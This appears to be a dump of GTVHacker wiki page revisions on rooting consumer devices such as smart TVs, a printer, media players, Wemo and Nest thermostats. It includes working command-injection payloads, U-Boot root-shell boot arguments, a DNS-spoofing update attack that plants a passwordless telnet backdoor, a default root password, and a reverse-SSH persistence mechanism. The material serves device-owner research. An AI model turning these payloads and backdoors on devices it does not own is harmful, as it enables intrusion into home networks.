* Connecting to the UART per the input above, press the spacebar while booting to interrupt the bootloader, U-Boot. From here you can execute your own bootloader commands. "setenv bootargs init=/bin/sh" will drop you to a root shell
* If you miss that, via UART again, a root console is active for 2-3 seconds after booting. As long as you enter your commands while it boots, they will be executed.
* There is also a command injection in the web interface. By inserting a command in the box nickname field (say ;reboot;) the command will be executed as root.
* Finally, the SPI flash chip holds the U-Boot environment, it can be reflashed to load a modified environment

Amazon FireTV

2014-08-11T23:06:20Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:AmazonFireTV.jpg|200px|left|thumb]]
[[Category:Media Players]]
This page will be dedicated to a general overview, descriptions, and information related to the Amazon FireTV.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B00CX5P8FC/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00CX5P8FC&linkCode=as2&tag=gtvcom-20&linkId=25I5UAPHAJOXM27U Purchase the FireTV at Amazon]

== Pinouts ==

<gallery>
File:FireTV Uart Pinout.jpg
File:FireTV EMMC Pinout.jpg
</gallery>

== Exploitation ==
EMMC refers to an Embedded Multi-Media Card which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.

Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line. In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.

Required Minimum Connections: VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors) GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.

The Amazon FireTV utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it's contents.

For the FireTV device specifically, you can mount the /system partition, which is EXT4. From here, just copy over the SuperSU APK into app, and the su binary to bin. Ensure that you properly chown the su binary (4755). This will allow for root access via ADB, and further examination of the system internals.

Epson Artisan 700/800

2014-08-11T23:01:21Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:EpsonArtisan700.jpg|200px|left|thumb]]
[[Category:Printers]]
This page will be dedicated to a general overview, descriptions, and information related to the Epson Artisan 700/800 printer.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B001DJ9IAA/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B001DJ9IAA&linkCode=as2&tag=gtvcom-20&linkId=MMQVXJLSRHPLTJGI Purchase the Epson Artisan 700/800 printer at Amazon]

== Pinouts ==
<gallery>
File:Artisan700.jpg
</gallery>

== Exploitation ==

The Epson Artisan 700/800 series printers feature a UART shell which is accessible via the pinout above.

By connecting to that output, you are given a menu with the following options:

<pre>
'r' : Reboot
'R' : Reset settings and reboot.
'a' : display current IP address.
'm' : display current mac address.
'f' : show /proc/meminfo.
'@' : run shell command
'l' : List current module status
'w' : WebService status print
's' : statussheet output
</pre>

Selecting '@' will allow you run commands as root on the printer.

Netgear NTV200-100NAS

2014-08-07T02:11:00Z

CJ: /* Exploitation */

__FORCETOC__
{{Disclaimer}}
[[File:NetgearNeoTV.jpg|200px|left|thumb]]
[[Category:Media Players]]
This page will be dedicated to a general overview, descriptions, and information related to the Netgear NTV200-100NAS media player.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B007YW4EQ8/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B007YW4EQ8&linkCode=as2&tag=gtvcom-20&linkId=AIOKVF6HQHOWDCZI Purchase the Netgear NTV200-100NAS at Amazon]

== UART Pinout ==
<gallery>
File:Ntv200-uart.jpg
</gallery>

== Exploitation ==

After analyzing and extracting the firmware by way of dumping the NAND flash, we discovered a flaw that allowed for code executing as root. This is a bit more complex than others, but it is still very straightforward to do.

Any of the "apps" on the device (flash applets) are downloaded from this url: http://updates1.netgear.com (yes, it's HTTP)

Using dnsspoof, we can spoof that url to point to a webserver that we control.

On that webserver, create the directory structure outlined below:

<pre>
/ntv200/us/game/
</pre>

Since we will be using the Texas Hold'em app to gain root, download and place in that folder this file: http://updates1.netgear.com/ntv200/us/game/texas.tar

This is a two step process:
*Step 1
**Place a symlink labeled "hackme" pointing to /
*Step 2
**Drop the actual payload through the symlink

So, we first modify texas.tar - Add a symlink of hackme to /
Copy that as texas.tar in the directory above, save it, and click the Texas Hold'em app. It will black screen, hit home a few times. Delete the texas.tar, and replace it with the new texas.tar that is created below:

Modify the tar, replace the symlink with a a folder structure:
<pre>
/hackme/mnt/pstor/
</pre>
Add a file in that directory called rcc.user calling telnet

<pre>
FIX---------
telnetd
</pre>
This file is run via bash as root and will persist at every boot. Login using the username root, no password!

Belkin Wemo

2014-08-07T01:53:52Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:BelkinWemo.png|200px|left|thumb]]
[[Category:Home Automation]]
This page will be dedicated to a general overview, descriptions, and information related to the Belkin Wemo.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B00BB2MMNE/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00BB2MMNE&linkCode=as2&tag=gtvcom-20&linkId=AKX4PJGS77XSRG57 Purchase the Belkin Wemo at Amazon]

== UART Pinout ==
<gallery>
File:BelkinWemoUart.png
</gallery>

== Exploitation ==
The Wemo has been the subject of many exploits, and below is another one that was believed closed by the community:

While booting the Wemo in Recovery mode, a root console is accessible for under 1 second via UART. Within this time a command can be run to terminate the reset process, leaving us with a root shell and full device access.

Start by connecting a UART adapter, as outlined in the above section, console speed 57600,8N1. Hold the recovery button while powering on the Wemo, and keep it held for 10 seconds.

When seeing output regarding flash erasing, paste the command below and hit enter. Repeat until you get a root shell!

<pre>
kill -9 $(ps | grep 'reboot'|sed -r -e 's/^ ([0-9]+) [0-9]+/\1/')
</pre>

A second bug allows you to boot a new kernel or execute bootloader commands by holding down buttons 0-4 when powering on. This will let you boot a new kernel, or drop to a U-Boot shell and enter your own commands.

Staples Connect Hub

2014-08-07T01:50:33Z

CJ: /* Exploitation */

__FORCETOC__
{{Disclaimer}}
[[File:Staples_Connect_Hub.jpg|200px|left|thumb]]
[[Category:Home Automation]]
This page will be dedicated to a general overview, descriptions, and information related to the Staples Connect Hub.

== Purchase ==
[http://www.staples.com/Staples-Connect-Hub-powered-by-Linksys/product_280287 Purchase the Staples Connect Hub]

== UART Pinout ==

<gallery>
File:StaplesConnectUART.png
</gallery>

== Exploitation ==

Utilizing a safeguard built into U-Boot, which is the bootloader running on the Staples Connect, we can modify the systems boot parameters, and execute our own code, or drop it to a root shell.

This works as during system bootup, the bootloader looks for environmental variables, stored on NAND flash. If it can not find these, it will execute defaults instead. The defaults feature a bootloader shell, which isn't disabled in the normal, saved environmental variables.

To ensure that the bootloader can not see the environmental variables at boot, timing is critical. By grounding out pin 29-30 while the system is booting (just at the right time), the box will boot, but fail to load the environmental variables, dropping us to a root shell. From here we can modify and resave the environmental variables, so that this process needs not be repeated.

*Boot system
*Count to 4
*Short pins 29-30 to ground
*Success: "Hit any key to stop autoboot"
*Fail: Hang / Crash / NAND not found.

It may take a few attempts to get this right, as timing is critical.

Run the commands below, boots to a root console.
<pre>
setenv bootargs "console=ttyS0,115200 init=/bin/sh mem=256M mtdparts=orion_nand:1M(uboot),32M(em-rfs),4M(em-kern),5M(pd-kern),-(pd-rfs) ubi.mtd=4,512 root=ubi0:rootfs rootfstype=ubifs rootflags=sync"
mw.b f1010140 0xFA; if nboot 0x600000 0 0x2500000; then mw.b f1010140 0xF5; bootm 0x600000; fi
</pre>

== SSH ==
Using the above to boot to a root console, edit /etc/rc.local, and add:
<pre>
dropbear -d 222
</pre>

Simply reboot, you can SSH on port 222 using the credentials below:

User: root
Password: oemroot

Hisense Android TV

2014-08-07T01:24:59Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:HisenseAndroidTV.jpg|200px|left|thumb]]
[[Category:Televisions]]
This page will be dedicated to a general overview, descriptions, and information related to the Hisense Android TV.

== Hisense Android TV ==

The Hisense Android TV is the first television on the market to feature "Google Services", and runs Android 4.2.2. Using a newer Marvell chipset, the hardware is essentially identical to that of a second generation Google TV.

== EMMC Pinout ==
<gallery>
file:Hisense_Vision_TV_EMMC_Pinout.jpg
</gallery>

== Exploitation ==

EMMC refers to an Embedded Multi-Media Card which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.

Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line. In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.

Required Minimum Connections:
VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors)

GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.

The Hisense Android TV utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it's contents.

For the Hisense device specifically, you can mount the /system partition, which is EXT4. From here, just copy over the SuperSU APK into app, and the su binary to bin. Ensure that you properly chown the su binary (4755). This will allow for root access via ADB, and further examination of the system internals.

Vizio Smart TV (VF553XVT)

2014-08-05T22:02:02Z

CJ: /* Images */

__FORCETOC__
{{Disclaimer}}
[[File:Vizio_SmartTV_VF553XVT.png|200px|left|thumb]]
[[Category:Televisions]]
This page will be dedicated to a general overview, descriptions, and information related to the Vizio Smart TV (VF553XVT).

== Images ==
<gallery>
file:Vizio LCE.png
</gallery>

== Exploitation ==

A Local Command Execution vulnerability exists in a series of Vizio Smart TV's, among others, that allows arbitrary commands to be run as root.

The LCE is found in the Wifi password field. Since the field is only accessible when the TV is offline, we will need to utilize a USB-UART device. Using that, we can create a shell with root access, settings 9600,8n1.

First enter the command below, it creates a character device pointing to the USB UART that we can talk to:
<pre>
;mknod /tmp/gtvhacker c 188 0;
</pre>

Next enter the command below, it pipes out input and output from the UART, to the character device, to the root shell:

<pre>
;bash 2>/tmp/gtvhacker>/tmp/gtvhacker</tmp/gtvhacker;bash;
</pre>

Exploiting Nest Thermostats

2014-06-24T01:22:46Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:NestRoot.png|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to exploiting the [[http://www.amazon.com/gp/product/B009GDHYPQ/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B009GDHYPQ&linkCode=as2&tag=gtvcom-20&linkId=A3NAIO5ALZZYZNRR Nest]] Thermostat.

== Affected Versions ==
All software versions of the [[http://www.amazon.com/gp/product/B009GDHYPQ/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B009GDHYPQ&linkCode=as2&tag=gtvcom-20&linkId=A3NAIO5ALZZYZNRR Nest]] Thermostat are affected by this root package. NestAttack utilizes a manufacturer loading method built into the CPU that can not be patched by software.

== Rooting Your Nest ==
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”. We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.

Usage:

Download package (Supports: Linux (Linux/OSX version in progress)).
Extract package.
Run the appropriate attack script depending on your OS. Follow instructions after executing.
Enjoy

== Video ==
Below is a video of the root being run, and SSH installed on a Nest Thermostat
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]

== Troubleshooting ==

* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.

== Contact ==

You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker

Exploiting Nest Thermostats

2014-06-24T01:20:54Z

CJ: /* Affected Versions */

__FORCETOC__
{{Disclaimer}}
[[File:NestRoot.png|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to exploiting the Nest Thermostat.

== Affected Versions ==
All software versions of the Nest Thermostat are affected by this root package. NestAttack utilizes a manufacturer loading method built into the CPU that can not be patched by software.

== Rooting Your Nest ==
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”. We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.

Usage:

Download package (Supports: Linux (Linux/OSX version in progress)).
Extract package.
Run the appropriate attack script depending on your OS. Follow instructions after executing.
Enjoy

== Video ==
Below is a video of the root being run, and SSH installed on a Nest Thermostat
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]

== Troubleshooting ==

* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.

== Contact ==

You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker

Exploiting Nest Thermostats

2014-06-24T01:20:20Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:NestRoot.png|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to exploiting the Nest Thermostat.

== Affected Versions ==
All software versions of the Nest Thermostat are affected by this root package. This is because it utilizes a recovery method built into the CPU that can not be patched by software.

== Rooting Your Nest ==
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”. We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.

Usage:

Download package (Supports: Linux (Linux/OSX version in progress)).
Extract package.
Run the appropriate attack script depending on your OS. Follow instructions after executing.
Enjoy

== Video ==
Below is a video of the root being run, and SSH installed on a Nest Thermostat
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]

== Troubleshooting ==

* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.

== Contact ==

You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker

Exploiting Nest Thermostats

2014-06-24T01:19:29Z

CJ: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Nest This page will be dedicated to exploiting the Nest Thermostat. == Affected Versions == All so..."

__FORCETOC__
{{Disclaimer}}
[[File:nest.png|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to exploiting the Nest Thermostat.

== Affected Versions ==
All software versions of the Nest Thermostat are affected by this root package. This is because it utilizes a recovery method built into the CPU that can not be patched by software.

== Rooting Your Nest ==
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”. We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.

Usage:

Download package (Supports: Linux (Linux/OSX version in progress)).
Extract package.
Run the appropriate attack script depending on your OS. Follow instructions after executing.
Enjoy

== Video ==
Below is a video of the root being run, and SSH installed on a Nest Thermostat
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]

== Troubleshooting ==

* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.

== Contact ==

You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker

File:NestRoot.png

2014-06-24T01:16:30Z

CJ:

Nest

2014-06-24T01:14:01Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:nest.jpg|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to a general overview of the Nest Thermostat, descriptions, and information related to the Nest Thermostat.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.

== GPL ==
Nest maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[https://nest.com/legal/compliance/]].

== Exploiting Nest Thermostats ==
* [[Exploiting Nest Thermostats]]

File:Nest.jpg

2014-06-24T01:13:48Z

CJ:

Nest

2014-06-24T01:12:46Z

CJ: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Nest This page will be dedicated to a general overview of the Nest Thermostat, descriptions, a..."

__FORCETOC__
{{Disclaimer}}
[[File:Roku-pile.jpg|200px|left|thumb]]
[[Category:Nest]]
This page will be dedicated to a general overview of the Nest Thermostat, descriptions, and information related to the Nest Thermostat.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.

== GPL ==
Nest maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[https://nest.com/legal/compliance/]].

== Exploiting Nest Thermostats ==
* [[Exploiting Nest Thermostats]]

Asus Cube

2014-01-01T23:30:31Z

CJ: /* Update History */

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
[[File:Cuberoot.png|200px|right|thumb]]
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download [http://download.gtvhacker.com/file/asus/Cuberoot.apk Here]

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]
*MASTER.20130523.021406 - Second OTA (05/23/2013). Adds Amazon instant video [http://android.clients.google.com/packages/ota/asus_buddybox/820fef142e1d.asus_google_cube-ota-20130523.021406.zip Download]
*MASTER.20131023.164739 - Adds VUDU support [http://android.clients.google.com/packages/ota/asus_buddybox/f709b679f477da791897a72af199eea9fe604f70.asus_google_cube-ota-20131023.180530.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

Roku

2013-12-28T03:28:06Z

CJ: /* Secret Screens */

__FORCETOC__
{{Disclaimer}}
[[File:Roku-pile.jpg|200px|left|thumb]]
[[Category:Roku]]
This page will be dedicated to a general overview of the Roku OS, descriptions, and information related to the Roku Streaming Player.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.

== GPL ==
Roku maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[http://www.roku.com/opensource roku.com/opensource]].

== Secret Screens ==
{| cell-spacing="2em"
|style="padding-right:20px;"|
{|
! width="300px"| Title
! style="padding-left:20px; border-left:thin #000000;"| Code
|-
|Secret Settings Screen
|H - H - H - H - H - FF - FF - FF - RW - RW
|-
|Secret Settings Screen 2
|H - H - H - H - H - U - R - D - L - U
|-
|Channel Info/Installed Software Versions
|H - H - H - U - U - L - R - L - R - L
|-
|Developer Settings
|H - H - H - U - U - R - L - R - L - R
|-
|Quality Settings/Bitrate Override Screen
|H - H - H - H - H - RW - RW - RW - FF - FF
|-
|Wifi Secret Screen
|H - H - H - H - H - U - D - U - D - U
|-
|Platform Settings
|H - H - H - H - H - FF - P - RW - P - FF
|-
|Antenna
|H - H - H - H - H - FW - D - RW - D - FF
|-
|Reboot?
|H - H - H - H - H - U - RW - RW - FW - FW
|}
| style="width:200px;" style="padding-left:40px;vertical-align:middle;"|
{|
! Letter
! Key
|-
|U
|Up
|-
|L
|Left
|-
|R
|Right
|-
|D
|Down
|-
|B
|Back
|-
|H
|Home
|}
|style="padding-left:40px; width:200px;vertical-align:middle;"|
{|
! Letter
! Key
|-
|RW
|Rewind
|-
|FF
|Fast Forward
|-
|P
|Play/Pause
|-
|RE
|Reset
|-
|O
|OK
|-
|A
|Asterisk (*)
|}
|}

Installing Custom Recovery (Gen 2 Only)

2013-08-15T00:53:08Z

CJ: /* Developers Only (CUBE, PULSE) (UART console required) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)
*1 USB Keyboard

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Download GTVHacker SecureBoot update.zip
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.
#Disconnect from adb and format a FAT32 drive.
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.
#Rename GTVHacker-secureboot-update.zip to update.zip
#Unmount and eject FAT32 drive.
#Plug FAT32 Drive and USB Keyboard into Google TV
#On host PC enter in the following to boot GoogleTV into recovery mode.
#: <code>adb reboot recovery</code>
#After entering GTVHacker recovery press 1 to install from update.zip.
#If install is successful, you will be prompted to press Q to exit.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-kernel /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
